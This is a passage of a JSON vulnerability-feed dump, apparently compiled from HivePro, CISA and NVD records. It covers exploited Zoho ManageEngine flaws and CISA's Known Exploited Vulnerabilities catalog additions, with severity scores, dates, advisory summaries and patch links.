"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-05T12:31:49", "type": "hivepro", "title": "Several Zoho ManageEngine products have been exploited", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44077", "CVE-2021-44515", "CVE-2021-44526"], "modified": "2021-12-05T12:31:49", "id": "HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280", "href": "https://www.hivepro.com/several-zoho-manageengine-products-have-been-exploited/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-01-25T11:31:01", "description": "Zoho has released a security advisory to address an authentication bypass vulnerability (CVE-2021-44757) in ManageEngine Desktop Central and Desktop Central MSP. 
An attacker could exploit this vulnerability to take control of an affected system.\n\nCISA encourages users and administrators to review the [Zoho Vulnerability Notification](<https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022>) and the Zoho [ManageEngine Desktop Central](<https://www.manageengine.com/products/desktop-central/cve-2021-44757.html>) and [ManageEngine Desktop Central MSP](<https://www.manageengine.com/desktop-management-msp/cve-2021-44757.html>) security advisories and apply the recommended mitigations immediately.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/19/zoho-releases-security-advisory-manageengine-desktop-central-and>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-01-19T00:00:00", "type": "cisa", "title": "Zoho Releases Security Advisory for ManageEngine Desktop Central and Desktop Central MSP", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, 
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44757"], "modified": "2022-01-19T00:00:00", "id": "CISA:5AF9A0A9C471BAA02A04E99AE31ED456", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/19/zoho-releases-security-advisory-manageengine-desktop-central-and", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-12-17T18:11:39", "description": "Zoho has released a security advisory to address an authentication bypass vulnerability in ManageEngine Desktop Central and Desktop Central MSP. An attacker could exploit this vulnerability to take control of an affected system. According to Zoho, this vulnerability is being actively exploited in the wild.\n\nCISA encourages users and administrators to review the [Zoho Vulnerability Notification](<https://pitstop.manageengine.com/portal/en/community/topic/an-authentication-bypass-vulnerability-identified-and-fixed-in-desktop-central-and-desktop-central-msp>) and the Zoho [ManageEngine Desktop Central](<https://www.manageengine.com/products/desktop-central/cve-2021-44515-authentication-bypass-filter-configuration.html>) and [ManageEngine Desktop Central MSP](<https://www.manageengine.com/desktop-management-msp/cve-2021-44515-security-advisory.html>) security advisories and apply the recommended mitigations immediately.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-06T00:00:00", "type": "cisa", "title": "Zoho Releases Security Advisory for ManageEngine Desktop Central and Desktop Central MSP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44515"], "modified": "2021-12-06T00:00:00", "id": "CISA:C9AC32BB051B58B7F0F6E0FD2949390C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/06/zoho-releases-security-advisory-manageengine-desktop-central-and", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:29:35", "description": "On September 16, CISA released [a joint alert ](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>)on exploitation of a vulnerability (CVE-2021-40539) in ManageEngine ADSelfService Plus. On November 8, security researchers from Palo Alto Networks and Microsoft Threat Intelligence Center (MSTIC) released separate reports on targeted attacks against ManageEngine ADSelfService Plus. 
\n\nCISA encourages organizations to review the indicators of compromise and other technical details in the following reports to uncover any malicious activity within their networks.\n\n * Palo Alto Networks: [Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>)\n * MSTIC: [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-09T00:00:00", "type": "cisa", "title": "Security Researchers Reveal Activity Targeting ManageEngine ADSelfService Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:00:00", "id": "CISA:2D62C340878780A9844A8FFDFA548783", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/09/security-researchers-reveal-activity-targeting-manageengine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:12:13", "description": "The Federal Bureau of Investigation (FBI), CISA, and Coast Guard Cyber Command (CGCYBER) have updated the [Joint Cybersecurity Advisory (CSA)](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) published on September 16, 2021, which details the active exploitation of an authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus\u2014a self-service password management and single sign-on solution.\n\nThe update provides details on a suite of tools APT actors are using to enable this campaign: \n\n * Dropper: a dropper trojan that drops Godzilla webshell on a system \n * Godzilla: a Chinese language web shell \n * NGLite: a backdoor trojan written in Go \n * KdcSponge: a tool that targets undocumented APIs in Microsoft\u2019s implementation of Kerberos for credential exfiltration \n\nNote: FBI, CISA, and CGCYBER cannot confirm the CVE-2021-40539 is the only vulnerability APT actors are leveraging as part of this activity, so it is key that network defenders focus on detecting the tools listed above in addition to initial access vector.\n\nCISA encourages organizations to review the November 19 update and apply the recommended mitigations. 
CISA also recommends reviewing the relevant blog posts from [Palo Alto Networks](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>), [Microsoft](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>), and [IBM Security Intelligence](<https://securityintelligence.com/posts/zero-day-discovered-enterprise-help-desk/>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/11/19/updated-apt-exploitation-manageengine-adselfservice-plus>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-19T00:00:00", "type": "cisa", "title": "Updated: APT Exploitation of ManageEngine ADSelfService Plus Vulnerability ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-24T00:00:00", 
"id": "CISA:906D00DDCD25874F8A28FE348820F80A", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/19/updated-apt-exploitation-manageengine-adselfservice-plus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:13:24", "description": "The Federal Bureau of Investigation (FBI), CISA, and Coast Guard Cyber Command (CGCYBER) have released [a Joint Cybersecurity Advisory (CSA)](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) detailing the active exploitation of an authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus\u2014a self-service password management and single sign-on solution. The FBI, CISA, and CGCYBER assess that advanced persistent threat (APT) cyber actors are likely among those exploiting the vulnerability. The exploitation of this vulnerability poses a serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software.\n\nCISA strongly encourages users and administrators to review [Joint FBI-CISA-CGCYBER CSA: APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) and immediately implement the recommended mitigations, which include updating to [ManageEngine ADSelfService Plus build 6114](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-16T00:00:00", "type": "cisa", "title": "FBI-CISA-CGCYBER Advisory on APT Exploitation of ManageEngine ADSelfService Plus Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-16T00:00:00", "id": "CISA:28BCD901AF6661FE02928495E4D03129", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:14:32", "description": "Zoho has released a security update on a vulnerability (CVE-2021-40539) affecting ManageEngine ADSelfService Plus builds 6113 and below. CVE-2021-40539 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system. ManageEngine ADSelfService Plus is a self-service password management and single sign-on solution for Active Directory and cloud apps. 
Additionally, CISA strongly urges organizations ensure ADSelfService Plus is not directly accessible from the internet.\n\nCISA encourages users and administrators to review the [Zoho advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) for more information and to update to ADSelfService Plus build 6114.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "cisa", "title": "Zoho Releases Security Update for ADSelfService Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-08T00:00:00", "id": "CISA:01AC83B2C29761024423083A8BE9CE80", "href": 
"https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-14T18:09:09", "description": "CISA has added thirteen new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number**\n\n| \n\n**CVE Title**\n\n| \n\n**Remediation Due Date** \n \n---|---|--- \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\n| \n\nApache Log4j2 Remote Code Execution Vulnerability\n\n| \n\n12/24/2021 \n \nCVE-2021-44515\n\n| \n\nZoho Corp. Desktop Central Authentication Bypass Vulnerability\n\n| \n\n12/24/2021 \n \nCVE-2021-44168\n\n| \n\nFortinet FortiOS Arbitrary File Download Vulnerability\n\n| \n\n12/24/2021 \n \n[CVE-2021-35394](<https://nvd.nist.gov/vuln/detail/CVE-2021-35394>)\n\n| \n\nRealtek Jungle SDK Remote Code Execution Vulnerability\n\n| \n\n12/24/2021 \n \n[CVE-2020-8816](<https://nvd.nist.gov/vuln/detail/CVE-2020-8816>)\n\n| \n\nPi-Hole AdminLTE Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2020-17463](<https://nvd.nist.gov/vuln/detail/CVE-2020-17463>)\n\n| \n\nFuel CMS SQL Injection Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-7238](<https://nvd.nist.gov/vuln/detail/CVE-2019-7238>)\n\n| \n\nSonatype Nexus Repository Manager Incorrect Access Control Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-13272](<https://nvd.nist.gov/vuln/detail/cve-2019-13272>)\n\n| \n\nLinux Kernel Improper Privilege Management Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-10758](<https://nvd.nist.gov/vuln/detail/CVE-2019-10758>)\n\n| \n\nMongoDB mongo-express Remote Code 
Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-0193](<https://nvd.nist.gov/vuln/detail/CVE-2019-0193>)\n\n| \n\nApache Solr DataImportHandler Code Injection Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2017-17562](<https://nvd.nist.gov/vuln/detail/cve-2017-17562>)\n\n| \n\nEmbedthis GoAhead Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2017-12149](<https://nvd.nist.gov/vuln/detail/CVE-2017-12149>)\n\n| \n\nRed Hat Jboss Application Server Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2010-1871](<https://nvd.nist.gov/vuln/detail/CVE-2010-1871>)\n\n| \n\nRed Hat Linux JBoss Seam 2 Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://cyber.dhs.gov/bod/22-01/>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). 
\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-10T00:00:00", "type": "cisa", "title": "CISA Adds Thirteen Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2017-12149", "CVE-2017-17562", "CVE-2019-0193", "CVE-2019-10758", "CVE-2019-13272", "CVE-2019-7238", "CVE-2020-17463", "CVE-2020-8816", "CVE-2021-35394", "CVE-2021-44168", "CVE-2021-44228", "CVE-2021-44515"], "modified": "2021-12-10T00:00:00", "id": "CISA:380E63A9EAAD85FA1950A6973017E11B", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:29:50", "description": "CISA has added 13 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number**\n\n| \n\n**CVE Title**\n\n| \n\n**Remediation Due Date** \n \n---|---|--- \n \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\n| \n\nApache Log4j2 Remote Code Execution Vulnerability\n\n| \n\n12/24/2021 \n \nCVE-2021-44515\n\n| \n\nZoho Corp. Desktop Central Authentication Bypass Vulnerability\n\n| \n\n12/24/2021 \n \nCVE-2021-44168\n\n| \n\nFortinet FortiOS Arbitrary File Download Vulnerability\n\n| \n\n12/24/2021 \n \n[CVE-2021-35394](<https://nvd.nist.gov/vuln/detail/CVE-2021-35394>)\n\n| \n\nRealtek Jungle SDK Remote Code Execution Vulnerability\n\n| \n\n12/24/2021 \n \n[CVE-2020-8816](<https://nvd.nist.gov/vuln/detail/CVE-2020-8816>)\n\n| \n\nPi-Hole AdminLTE Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2020-17463](<https://nvd.nist.gov/vuln/detail/CVE-2020-17463>)\n\n| \n\nFuel CMS SQL Injection Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-7238](<https://nvd.nist.gov/vuln/detail/CVE-2019-7238>)\n\n| \n\nSonatype Nexus Repository Manager Incorrect Access Control Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-13272](<https://nvd.nist.gov/vuln/detail/cve-2019-13272>)\n\n| \n\nLinux Kernel Improper Privilege Management Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-10758](<https://nvd.nist.gov/vuln/detail/CVE-2019-10758>)\n\n| \n\nMongoDB mongo-express Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2019-0193](<https://nvd.nist.gov/vuln/detail/CVE-2019-0193>)\n\n| \n\nApache Solr 
DataImportHandler Code Injection Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2017-17562](<https://nvd.nist.gov/vuln/detail/cve-2017-17562>)\n\n| \n\nEmbedthis GoAhead Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2017-12149](<https://nvd.nist.gov/vuln/detail/CVE-2017-12149>)\n\n| \n\nRed Hat Jboss Application Server Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[CVE-2010-1871](<https://nvd.nist.gov/vuln/detail/CVE-2010-1871>)\n\n| \n\nRed Hat Linux JBoss Seam 2 Remote Code Execution Vulnerability\n\n| \n\n6/10/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). 
\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T00:00:00", "type": "cisa", "title": "CISA Adds 13 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2017-12149", "CVE-2017-17562", "CVE-2019-0193", "CVE-2019-10758", "CVE-2019-13272", "CVE-2019-7238", "CVE-2020-17463", "CVE-2020-8816", "CVE-2021-35394", "CVE-2021-44168", "CVE-2021-44228", "CVE-2021-44515"], "modified": "2022-01-25T00:00:00", "id": "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/cisa-adds-13-known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-07-13T18:02:26", "description": "Zoho ManageEngine Desktop Central before 10.1.2137.9 and Desktop Central MSP before 10.1.2137.9 allow attackers to bypass authentication, and read sensitive information or upload an arbitrary ZIP archive to the server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-01-18T10:15:00", "type": "cve", "title": "CVE-2021-44757", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 